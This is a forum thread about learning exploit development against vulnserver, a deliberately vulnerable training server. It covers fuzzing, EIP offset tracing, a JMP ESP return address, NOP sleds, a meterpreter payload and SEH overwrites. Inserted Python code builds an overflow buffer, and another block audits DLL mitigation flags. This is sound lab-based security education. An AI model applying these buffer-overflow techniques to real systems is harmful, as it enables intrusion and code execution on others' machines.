
Vulnserver And Ollydbg, I Need Some Help With Seh Chains

Lately I have been learning about writing your own exploits using Steve Bradshaw's vulnserver. For those who are unfamiliar, it is a Telnet server that is purposely vulnerable to exploitation. I wrote one exploit for it, but I was hoping that someone could point me in the right direction for a couple of other exploitation methods that I am having trouble with. I will make these questions red so it's easier to find them.

I'll start by telling you what I learned so that way there is no miscommunication.

First off, we use SPIKE, which is a general fuzzer, to push random buffer lengths into a command. We set the command that we want to use by setting the header. Next we just make a string variable to hold our random buffer value and we are off. (PS. I also wrote a BASH script to pump out these scripts because I am lazy.)

Pretty simple so far. So next we fuzz the target command using SPIKE's generic_send_tcp program. If it crashes, it is possible that it is vulnerable to attack. We use Wireshark to trace back the packets; vulnserver tells you if the command completed successfully or not, so we look for TCP streams that don't have that at the end. I was doing this for the TRUN command, which happens to crash around 5000 bytes.

Now we need to write a Perl script to fuzz the target more intelligently. (I also wrote a BASH script to pump these out for me since, yet again, I am lazy.)

So basically, a quick look at what is going on. /pentest/exploits/framework/tools/pattern_create.rb $junksize runs a command that creates a traceable pattern, so if we overwrite EIP we can use this to trace EIP back and see how many bytes it took to crash it. The header is the command. Next I open OllyDbg on vulnserver and run vulnserver. Then I use my newly created fuzzing script to crash the program. I then take the value of EIP, pop it into the tracing program, and find that it is 2003 bytes in (I am still talking about the TRUN command).

I pretty much understand everything up to this point, however I am a little fuzzy on the next part :/

Next we write our exploit.
Basically we just fill in that 2003-character space with junk values (for debugging purposes I just use 'A' (\x41)).
Next we grab a JMP ESP command from a DLL it loads. The reason we do this is because most DLLs won't be compiled with ASLR or SafeSEH. Beyond that I don't have a clue why we need this. This is one question I'd love answered. Then we pack the value into Little Endian format. I understand what Little Endian format is, but I don't understand why we need to pack the value like that. The line is

Code:

$eip = pack('V', 0x625011af);   # 'V' = unsigned 32-bit little-endian; the address is a number, not a string

Next we insert our shellcode (I wrote a script to just grab a meterpreter payload and insert it here; the script is at the end of this section).
Next we make a NOP sled. I understand why we use it; however, the tutorial I used for this didn't explain how he arrived at the number of NOPs he did (he used 20). How do you know how many NOPs to use for your sled? Lastly, we just send it over the wire.

So the exploit works fine. Next, I wanted to try to make my own; however, I hit some roadblocks. The commands I tried to use were GMON, KSTET, and GTER. All crashed when I used the SPIKE fuzzer. However, I run into the same problem with each of them: each one has an extremely small junk space (GMON was untraceable, I don't think it's overwriting EIP; KSTET only had 66 bytes; GTER only has 147 bytes). I noticed there isn't enough space for the shellcode. I first noticed it when I threw in some breakpoints (\xCC) at the beginning and end of the shellcode. It would hit the first one, but not the second. Later I just changed the shellcode in my script to \x42 x 1000, and I noticed not all of the Bs showed up. I know there are a couple of tricks to making shellcode execute from a different location, but the one I would prefer to use is overwriting the SEH chains. The SEH chains are an error-handling address that gets called when the program crashes; the SEH chains in vulnserver point to ntdll. What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

List of questions:

How does the JMP ESP address from a non-ASLR DLL help us execute shellcode?

Why do we need to pack the EIP address in little endian format?

How do we know how many NOPs to use in our sled?

What is the proper method for overwriting SEH and hiding our shellcode somewhere else?
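The offset-tracing and packing steps described in the post above, as an added example in Python. It is not the poster's Perl scripts or the Metasploit tools: it reimplements the pattern_create/pattern_offset logic, shows what the EIP value seen in OllyDbg looks like for a constructed crash at the post's offset of 2003, and lays the buffer out with the post's 0x625011af address packed the way Perl's pack('V') does. The INT3 bytes (\xCC) stand in for a payload, as in the post's own breakpoint trick; the crash value and the 5000-byte pattern length are constructed for the demo.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length):
    """Same sequence as Metasploit's pattern_create.rb (Aa0Aa1...Aa9Ab0...):
    every 4-byte window is unique within the first 20280 bytes, which is what
    lets a crash value be traced back to exactly one offset."""
    out = bytearray()
    for u in ascii_uppercase:
        for l in ascii_lowercase:
            for d in digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, length=5000):
    """Map the EIP value printed by the debugger back to a pattern offset.
    EIP holds a little-endian dword, so the bytes that sat in the buffer are
    the debugger's hex digits read pairwise from right to left; packing with
    '<I' reverses them for us before searching. Returns None if not found."""
    needle = struct.pack('<I', eip_value)
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


def build_buffer(offset, ret_addr, nop_len, payload):
    """Layout from the post: junk up to EIP, the return address packed
    little-endian (Python '<I' is the same as Perl pack('V')), a NOP sled,
    then the payload."""
    return (b'A' * offset
            + struct.pack('<I', ret_addr)
            + b'\x90' * nop_len
            + payload)


def demo():
    pat = pattern_create(5000)
    # Constructed crash: assume the 4 pattern bytes at offset 2003 ended up in
    # EIP, as the post reports for TRUN. The buffer holds b'7Co8' there, but
    # the debugger prints the dword as 386F4337 because it is little-endian.
    eip_seen = struct.unpack('<I', pat[2003:2007])[0]
    offset = pattern_offset(eip_seen)
    # INT3 bytes as a stand-in payload, like the post's breakpoint test.
    buf = build_buffer(offset, 0x625011af, 20, b'\xcc' * 8)
    return offset, eip_seen, buf


if __name__ == '__main__':
    offset, eip_seen, buf = demo()
    print(f'EIP seen in debugger: {eip_seen:08X} -> pattern offset {offset}')
    print('bytes written into the EIP slot:', buf[offset:offset + 4].hex())
```

Perl's pack('V', 0x625011af) and Python's struct.pack('<I', 0x625011af) both emit the bytes af 11 50 62; when the CPU pops those four bytes into EIP it reassembles them as 625011AF, which is why the address has to be written reversed in the buffer.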

Re: Vulnserver And Ollydbg, I Need Some Help With Seh Chains

Don't know if this forum is necessarily the right place for this type of question, since it's only tangentially related to BT; however, since the mods have allowed it, I will answer for you.

Beyond that I don't have a clue why we need this. This is one question I'd love answered.

Why do we grab the address of a JMP ESP instruction from a DLL without ASLR and SafeSEH? Because they are exploit prevention techniques that can be bypassed by using DLLs compiled without them. Briefly, ASLR randomises the base address where DLLs are loaded, making it harder for us to predict where instructions located within that DLL will be located when our exploit runs. ASLR only applies when the Operating System and the module/DLL support it (for Windows this is Vista and upwards). SafeSEH allows a module to specify a set of authorised SE handlers within that module, so that in the event of an exception only those addresses can be used to handle exceptions. This is only important on Operating Systems and modules that support SafeSEH (on Windows it's XP SP2 and up) and when you are writing an SEH exploit.

I understand what Little Endian format is but, I don't understand why we need to pack the value like that.

It needs to be packed into little endian format because the processor reads values from the stack in little endian format, where the most significant bytes are to the right. We need to provide the address in the format the CPU is expecting.

How do you know how many NOPs to use for your sled?

Guestimation/trial and error

For stack overflows, I usually start with NOP sleds of 16 to 32 bytes in size, depending on available buffer space. For most of the Vulnserver exploits, NOPsleds are not strictly necessary, I just added them so the reader can see what they are for/how they are used.

What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

The SEH handler on the stack sometimes gets overwritten during a stack overflow, and if you can make this happen then an SEH exploit may be possible. Vulnserver was written specifically to allow SEH overwrites to occur only in the GMON variable (see here http://resources.infosecinstitute.com/seh-exploit/); however, it's not probably impossible that you have caused one to occur for one of the other vulnerable commands. I can tell you, however, that all of the other vulnerable functions can be exploited without the use of SEH overwrites, and that is how they will be shown in future tutorials. In a few cases you need to use those tricks you referred to for executing shellcode from another location in memory (a new tutorial on one of those methods just got posted, but the formatting is still kind of rough at the moment and I'm getting it sorted with the Infosec guys), and in others you will need to send the data in a particular format.

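The ASLR and SafeSEH properties the reply describes are recorded in a module's PE header, which is where a developer or defender audits them before shipping or deploying a DLL. The following is an added example in Python, not the reply author's code and not part of Vulnserver or its tutorials: it parses the DllCharacteristics field (the DYNAMIC_BASE bit is the ASLR opt-in, NX_COMPAT the DEP opt-in) and the Load Config data directory of a PE image. Treating a present Load Config directory as "SafeSEH-capable" is a simplification made here and labelled as such; a full check reads the SEHandlerTable inside that structure. The two headers it runs on are constructed in the block and are not real DLLs.

```python
import struct

# Bits of IMAGE_OPTIONAL_HEADER.DllCharacteristics (values from the PE spec).
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # module opts in to ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # module opts in to DEP
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400        # module uses no SEH at all
LOAD_CONFIG_DIR_INDEX = 10                      # data directory that holds SafeSEH tables


def pe_mitigations(data):
    """Parse the headers of a PE image (bytes) and report the mitigation flags.
    'safeseh_capable' is a simplification: a non-empty Load Config directory is
    necessary for SafeSEH but the real test is a non-zero SEHandlerTable there."""
    if data[:2] != b'MZ':
        raise ValueError('not a PE file: missing MZ signature')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('not a PE file: missing PE signature')
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, _ = struct.unpack_from('<HHIIIHH', data, coff)
    opt = coff + 20
    if opt_size < 72:
        raise ValueError('optional header too short')
    is_pe32plus = struct.unpack_from('<H', data, opt)[0] == 0x20B
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    dll_chars = struct.unpack_from('<H', data, opt + 70)[0]
    # NumberOfRvaAndSizes is at 92 (PE32) or 108 (PE32+); directories follow it.
    nrva_off = opt + (108 if is_pe32plus else 92)
    nrva = struct.unpack_from('<I', data, nrva_off)[0]
    load_cfg_rva = load_cfg_size = 0
    if nrva > LOAD_CONFIG_DIR_INDEX:
        load_cfg_rva, load_cfg_size = struct.unpack_from(
            '<II', data, nrva_off + 4 + 8 * LOAD_CONFIG_DIR_INDEX)
    return {
        'machine': machine,
        'pe32plus': is_pe32plus,
        'aslr': bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        'dep': bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        'no_seh': bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        # SafeSEH is a 32-bit (PE32) mechanism only.
        'safeseh_capable': (not is_pe32plus) and load_cfg_rva != 0 and load_cfg_size != 0,
    }


def make_header(dll_chars, with_load_config):
    """Constructed minimal PE32 image header (no sections) for the demo."""
    dos = bytearray(64)
    dos[:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 64)            # e_lfanew -> PE signature at 64
    coff = struct.pack('<HHIIIHH', 0x014C, 0, 0, 0, 0, 224, 0x2102)  # i386 DLL
    opt = bytearray(224)                              # 96 fixed bytes + 16 directories
    struct.pack_into('<H', opt, 0, 0x10B)             # PE32 magic
    struct.pack_into('<H', opt, 70, dll_chars)
    struct.pack_into('<I', opt, 92, 16)               # NumberOfRvaAndSizes
    if with_load_config:
        struct.pack_into('<II', opt, 96 + 8 * LOAD_CONFIG_DIR_INDEX, 0x3000, 0x40)
    return bytes(dos) + b'PE\0\0' + coff + bytes(opt)


def demo():
    """A legacy-style module with nothing enabled beside a hardened one."""
    legacy = pe_mitigations(make_header(0, False))
    hardened = pe_mitigations(make_header(
        IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT, True))
    return legacy, hardened


if __name__ == '__main__':
    for name, info in zip(('legacy', 'hardened'), demo()):
        print(name, {k: v for k, v in info.items() if k != 'machine'})
```

A module like the "legacy" one above is what the reply means by a DLL compiled without ASLR or SafeSEH: its load address is predictable and any handler address inside it is accepted during exception dispatch. Rebuilding such modules with /DYNAMICBASE, /NXCOMPAT and /SAFESEH flips exactly the bits this parser reports.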